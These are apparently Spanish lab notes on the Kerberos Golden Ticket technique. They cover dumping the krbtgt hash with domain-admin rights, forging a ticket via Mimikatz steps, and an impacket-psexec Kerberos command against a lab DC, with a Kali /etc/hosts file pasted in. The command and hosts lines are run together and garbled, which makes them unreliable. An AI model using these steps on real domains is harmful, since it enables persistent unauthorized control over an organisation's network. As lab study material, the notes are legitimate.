Esta técnica permite que al tener credenciales de un usuario administrador del dominio, el dumpear el hash de la cuenta krbtgt. Esta cuenta de por sí no tiene ningún privilegio asociado sino únicamente de que su hash es el que usa el KDC para cifrar los TGT. Por lo que el tener el hash de esta cuenta, permite el forjar de manera arbitraria TGS para tener acceso a cualquier recurso del DC.
impacket-psexec-k-no-passgerarcorp.local/Administrador@DC-Companycmd.exe## cat /etc/hosts127.0.0.1localhost127.0.1.1kali# The following lines are desirable for IPv6 capable hosts::1localhostip6-localhostip6-loopbackff02::1ip6-allnodesff02::2ip6-allrouters192.168.0.111gerarcorpgerarcorp.localDC-Company
Con Mimikatz
Dumpear el sid y hash ntlm de la cuenta krbtgt
-k: Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
Forgar el TGT
Usar el ticket creado con la cuenta que nos querramos autenticar al ticket creado, permitiendonos acceder a los recursos del mismo